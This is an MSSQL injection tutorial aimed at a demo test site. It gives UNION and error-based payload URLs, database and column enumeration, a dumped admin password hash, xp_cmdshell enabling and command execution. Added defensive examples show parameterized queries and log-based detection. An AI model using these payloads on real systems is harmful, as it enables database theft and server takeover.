MSSQL Injection


(((0x1 :- Basic Recon Stage)))

-1 union all select 1,2--

-1 union all select null,2--

null union all select 1,null--

1 union all select 1,null--

null union all select @@version,2--

null union all select schema_name,2 from information_schema.schemata--

-1 UNION SELECT table_name,2 FROM information_schema.tables--

null UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--

-1+UNION+SELECT upass,2 FROM users where uname='admin'--
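Added example (not code from the original post): the UNION payloads above only work because the id parameter is pasted straight into the SQL text. The script below uses Python with an in-memory SQLite database standing in for SQL Server; UNION ALL and the -- terminator behave the same way, while the MSSQL-only convert(int,...) error trick is not reproduced. The forums/users schema, the row values and the function names are constructed for this example, not the test site's real data. It shows the concatenating query leaking the users table and the two fixes, a bound parameter and an integer type check, refusing the same input.

```python
import sqlite3

# Constructed schema mirroring the forum/users layout the payloads target.
# Table and column names are assumptions for illustration only.
SCHEMA = """
CREATE TABLE forums (id INTEGER PRIMARY KEY, title TEXT, descr TEXT);
CREATE TABLE users  (uname TEXT, upass TEXT, alevel INTEGER);
INSERT INTO forums VALUES (1, 'General', 'General discussion');
INSERT INTO users  VALUES ('admin', 'constructed-hash-value', 1);
"""

# The same shape of payload the post uses: kill the real row, append attacker-chosen columns.
PAYLOAD = "0 and 1=2 union all select uname,upass from users--"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def show_forum_vulnerable(conn, forum_id):
    """Classic ASP pattern: the request parameter becomes part of the SQL text."""
    sql = "SELECT title, descr FROM forums WHERE id=" + forum_id
    return conn.execute(sql).fetchall()


def show_forum_parameterized(conn, forum_id):
    """Bound parameter: the driver sends the value separately, it is never parsed as SQL."""
    return conn.execute("SELECT title, descr FROM forums WHERE id=?", (forum_id,)).fetchall()


def is_valid_id(value):
    """Defence in depth: an id is an integer, so anything else is rejected before the query."""
    try:
        int(value)
        return True
    except (TypeError, ValueError):
        return False


def show_forum_typed(conn, forum_id):
    """Type check first, then bind the parsed integer."""
    if not is_valid_id(forum_id):
        raise ValueError("id must be an integer")
    return conn.execute("SELECT title, descr FROM forums WHERE id=?", (int(forum_id),)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("vulnerable  :", show_forum_vulnerable(db, PAYLOAD))   # leaks admin credentials row
    print("parameterized:", show_forum_parameterized(db, PAYLOAD))  # no rows
    print("typed        :", is_valid_id(PAYLOAD))                  # False
```

The bound-parameter version is the real fix; the integer check is a cheap second layer that also gives you a clean place to log rejected input.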

UserName

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,user_name())--

acunetix

Check if Website is Vulnerable

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1-- [True]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=2-- [False]

SQL Server Version

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@version))--

Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Server Name

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@servername))--

VPS19760

(((0x2 :- Enumerating Other Databases)))

[Listing Database Names]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(1)))--

master

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(2)))--

tempdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(3)))--

model

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(4)))--

msdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(5)))--

acublog

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(6)))--

acuforum

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(7)))--

acuservice

(((0x3 :- Enumerating Table Names for each database)))

[*]Database : [master]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' ),NULL--

spt_fallback_db

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db') ),NULL--

spt_fallback_dev

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev') ),NULL--

spt_fallback_usg

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev','spt_fallback_usg') ),NULL--

spt_monitor

Same Goes On….

[*]Database : [acublog]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' ),NULL--

comments

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments') ),NULL--

news

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments','news') ),NULL--

users

[*]Database : [acuforum]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' ),NULL--

threads

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads')),NULL--

users

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users')),NULL--

forums

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users','forums')),NULL--

posts

Same...

[*]Database : [acuservice]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuservice..sysobjects WHERE xtype = 'U' ),NULL--

(((0x4 :- Fetching Column Names for Tables in the Same and Other Databases)))

[*]Database : [acublog]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' ))--

uname

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname') ))--

upass

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname','upass') ))--

alevel

Same way for the other tables and databases: keep adding each returned name to the NOT IN list until the query returns nothing.
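Added example (not code from the original post): every probe from 0x1 to 0x4 leaves a distinctive query string in the web server log, so the cheap detection is to decode cs-uri-query and match on it. The script below parses constructed IIS W3C-style lines (the field order and the client addresses are assumptions for this example), decodes the query string, tags each request with the signatures it matches (UNION SELECT, convert(int,...), @@version and friends, sysobjects/syscolumns lookups, the and N=M boolean probe, the trailing -- terminator) and separately reports any client that sent both the true and the false form of the boolean probe against the same page, which is the "is it vulnerable" check from 0x1.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# Field order and addresses are assumptions for this example.
SAMPLE_LOG = """\
2024-05-01 10:00:01 203.0.113.7 GET /showforum.asp id=1 200
2024-05-01 10:00:02 203.0.113.7 GET /showforum.asp id=0+and+1=1-- 200
2024-05-01 10:00:03 203.0.113.7 GET /showforum.asp id=0+and+1=2-- 500
2024-05-01 10:00:04 203.0.113.7 GET /showforum.asp id=0+and+1=convert(int,(select+@@version))-- 500
2024-05-01 10:00:05 203.0.113.7 GET /showforum.asp id=0+and+1=2+UNION+ALL+SELECT+(SELECT+top+1+name+FROM+master..sysobjects+WHERE+xtype+%3D+%27U%27),NULL-- 200
2024-05-01 10:00:06 198.51.100.9 GET /showforum.asp id=42 200
"""

# Signatures for the probe styles used in 0x1 to 0x4; all matched on the decoded, lowercased query.
SIGNATURES = {
    "union_select":  re.compile(r"union\s+(?:all\s+)?select", re.I),
    "error_based":   re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "server_probe":  re.compile(r"@@(?:version|servername)|\b(?:db_name|user_name)\s*\(", re.I),
    "catalog_query": re.compile(r"\b(?:sysobjects|syscolumns|information_schema)\b", re.I),
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "comment_tail":  re.compile(r"--\s*$|/\*"),
}

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)$"
)


def decode_query(raw):
    # IIS stores the query string URL-encoded and attackers commonly use '+' for spaces.
    # Decode twice so a double-encoded payload is still visible; a literal %2B would also
    # become a space, which is acceptable for matching purposes.
    return unquote_plus(unquote_plus(raw)).lower()


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = decode_query(rec["query"])
    return rec


def classify(decoded):
    """Names of every signature the decoded query string matches, in SIGNATURES order."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(log_text):
    """(client, page, decoded query, tags) for every request that matched at least one signature."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        tags = classify(rec["decoded"])
        if tags:
            hits.append((rec["ip"], rec["stem"], rec["decoded"], tags))
    return hits


def boolean_pair_clients(log_text):
    """Clients that sent both a true (N=N) and a false (N=M) boolean probe to the same page."""
    seen = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        m = re.search(r"\band\s+(\d+)\s*=\s*(\d+)", rec["decoded"])
        if m:
            seen.setdefault((rec["ip"], rec["stem"]), set()).add(m.group(1) == m.group(2))
    return {key for key, outcomes in seen.items() if outcomes == {True, False}}


if __name__ == "__main__":
    for ip, stem, query, tags in scan(SAMPLE_LOG):
        print(ip, stem, tags, query)
    print("boolean probe pairs:", boolean_pair_clients(SAMPLE_LOG))
```

The 500 responses next to the convert(int,...) requests are the error-based channel itself: a spike of 5xx on one page from one client, combined with these tags, is the pattern worth alerting on.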

(((0x5 :- Fetching Data from Columns)))

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users;

admin

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select upass,null from acublog.dbo.users;

334c4a4c42fdb79d7ebc3e73b517e6f8

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users WHERE uname NOT IN ('admin');

[Returns nothing here because the table has only one row, but the same NOT IN filter walks through further rows when there are more]

(((0x6 :- Enable xp_cmdshell if current_user is 'sa')))

For a string parameter:

http://testasp.vulnweb.com/showforum.asp?name=test'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--

For an integer parameter:

http://testasp.vulnweb.com/showforum.asp?id=0; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--

(((0x7 :- Reading a Local File and Inserting It into a Table)))

CREATE TABLE mydata (line varchar(8000));

BULK INSERT mydata FROM 'C:\output.txt';

DROP TABLE mydata;

(((0x8 :- Execute Command Shell)))

'; exec xp_cmdshell 'net user > c:\output.txt';--
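Added example (not code from the original post): the xp_cmdshell path above only exists when the application login is sysadmin and nobody notices the configuration change. sp_configure writes an informational "Configuration option '...' changed from X to Y" message to the SQL Server error log, so the server-side evidence of the stacked query in 0x6 is two such lines from one spid a fraction of a second apart. The script below parses a constructed ERRORLOG excerpt (the message text is sp_configure's; the timestamps, spids and line layout are made up for this example), lists every configuration change, flags the enabling of high-risk options, and raises an alert when 'show advanced options' is followed on the same spid by a high-risk enable within a short window. The HIGH_RISK_OPTIONS set is an assumption, not an exhaustive list.

```python
import re
from datetime import datetime

# Constructed SQL Server ERRORLOG excerpt. Message wording follows sp_configure's
# informational message; timestamps, spids and surrounding lines are made up.
SAMPLE_ERRORLOG = """\
2024-05-01 10:00:00.10 Server      Server process ID is 1234.
2024-05-01 10:00:07.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:00:07.20 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 11:30:00.00 spid61      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
"""

CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement hands a database login a route to the OS or to remote data.
# Assumed set for this example; extend it for your environment.
HIGH_RISK_OPTIONS = {
    "xp_cmdshell",
    "Ole Automation Procedures",
    "Ad Hoc Distributed Queries",
    "clr enabled",
}


def parse_config_changes(log_text):
    """Every sp_configure change in the log as dicts with parsed timestamp and integer values."""
    changes = []
    for line in log_text.splitlines():
        m = CONFIG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S.%f")
        d["old"], d["new"] = int(d["old"]), int(d["new"])
        changes.append(d)
    return changes


def high_risk_enables(log_text):
    """Changes that switched a high-risk option from off to on."""
    return [c for c in parse_config_changes(log_text)
            if c["option"] in HIGH_RISK_OPTIONS and c["old"] == 0 and c["new"] != 0]


def show_advanced_then_risky(log_text, window_seconds=60):
    """(spid, option, timestamp) for each 'show advanced options' enable that the same spid
    followed with a high-risk enable inside the window: the sequence a stacked query produces."""
    changes = parse_config_changes(log_text)
    alerts = []
    for i, c in enumerate(changes):
        if c["option"] != "show advanced options" or c["new"] != 1:
            continue
        for later in changes[i + 1:]:
            if (later["spid"] == c["spid"]
                    and later["option"] in HIGH_RISK_OPTIONS
                    and later["new"] != 0
                    and (later["ts"] - c["ts"]).total_seconds() <= window_seconds):
                alerts.append((c["spid"], later["option"], later["ts"]))
    return alerts


if __name__ == "__main__":
    for c in parse_config_changes(SAMPLE_ERRORLOG):
        print(c["ts"], c["spid"], c["option"], c["old"], "->", c["new"])
    print("alerts:", show_advanced_then_risky(SAMPLE_ERRORLOG))
```

The better control is to make the message never appear: run the web application under a login that is not sysadmin, leave xp_cmdshell and the other options in HIGH_RISK_OPTIONS disabled, and alert on the lines above so a change made through the application is caught even when someone does get sysadmin.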
